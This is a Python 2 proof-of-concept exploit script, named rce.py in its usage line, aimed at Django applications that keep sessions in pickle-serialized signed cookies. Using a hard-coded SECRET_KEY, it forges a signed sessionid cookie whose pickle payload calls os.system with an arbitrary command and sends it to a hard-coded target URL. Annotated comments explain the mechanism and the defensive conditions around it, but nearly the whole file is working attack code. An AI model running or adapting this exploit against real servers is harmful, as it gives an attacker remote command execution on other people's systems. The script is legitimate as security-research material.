# coding: UTF-8
# Written by Orange@chroot.org
#
import sys
import hmac
import time
import hashlib
import base64
from random import randint
import requests
# Base URL that the request at the bottom of the script is sent to
# (the hostname suggests the author's own demo instance -- not verifiable from this file).
URL = "http://vuln-django.orange.tw/"
# Django SECRET_KEY of the target application, used below as the HMAC signing secret.
# Defensive note: anyone holding this value can produce cookies the server will accept
# as authentic, so a disclosed SECRET_KEY should be treated as a compromise and rotated.
SECRET_KEY = "1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk"
# Salt string for the signature; it is the dotted path of Django's signed-cookie
# session backend module.
SALT = "django.contrib.sessions.backends.signed_cookies"
def salted_hmac(key_salt, value, secret=None):
    """Return an HMAC-SHA1 object over *value*.

    The HMAC key is the SHA-1 digest of ``key_salt + secret`` (UTF-8 encoded).
    *value* is coerced with ``force_bytes`` before being authenticated.

    Note: ``secret`` defaults to ``None`` but no fallback is applied here, so
    callers must always pass it; concatenating ``None`` raises ``TypeError``.
    """
    key_material = (key_salt + secret).encode('utf-8')
    derived_key = hashlib.sha1(key_material).digest()
    message = force_bytes(value)
    return hmac.new(derived_key, msg=message, digestmod=hashlib.sha1)
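def b64_encode(s):
    """Return the URL-safe base64 encoding of bytes *s* without '=' padding.

    The original file defined this function twice with identical bodies; the
    redundant second definition is dropped. Padding only ever appears at the
    end of base64 output, so stripping it from the right is sufficient.
    """
    return base64.urlsafe_b64encode(s).rstrip(b'=')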
def base64_hmac(salt, value, key):
    """Return the unpadded URL-safe base64 of the salted HMAC of *value*.

    Thin composition of ``salted_hmac`` (keyed by *salt* and *key*) and
    ``b64_encode``.
    """
    mac = salted_hmac(salt, value, key)
    raw_digest = mac.digest()
    return b64_encode(raw_digest)
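def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
    """Coerce *s* to a byte string.

    The original body referenced ``Promise`` and ``six``, neither of which is
    imported in this file, so any input that was not already ``bytes`` (or
    short-circuited by ``strings_only``) raised ``NameError``. This version
    keeps the same branches but relies only on builtins.

    Args:
        s: value to convert.
        encoding: target encoding; bytes input is returned untouched when this
            is 'utf-8', otherwise it is re-encoded from UTF-8.
        strings_only: when true, ``None`` and ints are returned unchanged.
        errors: error handler passed to encode/decode.

    Returns:
        ``bytes``, or *s* itself for the ``strings_only`` pass-through cases.
    """
    if isinstance(s, bytes):
        if encoding == 'utf-8':
            return s
        return s.decode('utf-8', errors).encode(encoding, errors)
    if strings_only and (s is None or isinstance(s, int)):
        return s
    # type(u'') is ``unicode`` on Python 2 and ``str`` on Python 3; bytes were
    # handled above, so this is the only remaining string type.
    text_type = type(u'')
    if isinstance(s, text_type):
        return s.encode(encoding, errors)
    try:
        if bytes is str:
            # Python 2: bytes() is str() and calls the object's __str__.
            return bytes(s)
        return text_type(s).encode(encoding)
    except UnicodeEncodeError:
        if isinstance(s, Exception):
            # Fall back to converting each exception argument separately.
            return b' '.join([force_bytes(arg, encoding, strings_only, errors)
                              for arg in s.args])
        return text_type(s).encode(encoding, errors)


# Alias kept from the original file: force_str is the same callable.
force_str = force_bytes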
class Exploit:
    """Holds a signing key and salt and computes cookie signatures with them.

    The signature is ``base64_hmac(salt + 'signer', value, key)``, i.e. the
    same salted-HMAC construction the rest of this file implements. A valid
    signature proves only that the signer knew the key, which is why the key
    must stay secret on the server side.
    """

    def __init__(self, key, salt):
        """Store the signing *key* and *salt* for later use."""
        self.salt = salt
        self.key = key

    def signature(self, value):
        """Return the signature of *value* as produced by ``force_str``."""
        signer_salt = self.salt + 'signer'
        mac = base64_hmac(signer_salt, value, self.key)
        return force_str(mac)
# Script entry point. Python 2 only: it uses the print statement.
#
# Defensive context: the request built here has an effect only on a server that
# (1) stores sessions in signed cookies, (2) deserializes them with pickle, and
# (3) signs with the SECRET_KEY hard-coded above. JSON session serialization
# (Django's default since 1.6) does not execute anything on load, and a secret
# key that is never disclosed prevents a valid signature from being produced.
if __name__ == '__main__':
    if len( sys.argv ) < 2:
        print 'Usage: python rce.py command'
        exit()
    # The first CLI argument is interpolated unmodified into the pickle stream below.
    cmd = sys.argv[1]
    # Text-protocol pickle: the 'c' opcode references os.system, one string
    # argument is pushed, and 'R' calls it when the stream is unpickled.
    payload = b"cos\nsystem\n(S'%s'\ntR." % cmd
    # Cookie value is "<base64 payload>:<current Unix time as an integer>".
    payload = '%s:%d' % (b64_encode( payload ), time.time() )
    # Sign the value with the known key and salt so it passes the server's HMAC check.
    sig = Exploit(SECRET_KEY, SALT).signature( payload )
    # Send the signed value as the session cookie; the cookie name is hard-coded to 'sessionid'.
    headers = { 'Cookie': 'sessionid="%s:%s";' % (payload, sig) }
    # Random integer as the query string -- presumably to avoid a cached response; TODO confirm.
    url = '%s?%d' % ( URL, randint(0, 65535) )
    # The response is discarded, and no timeout is passed to requests.get.
    requests.get( url, headers=headers )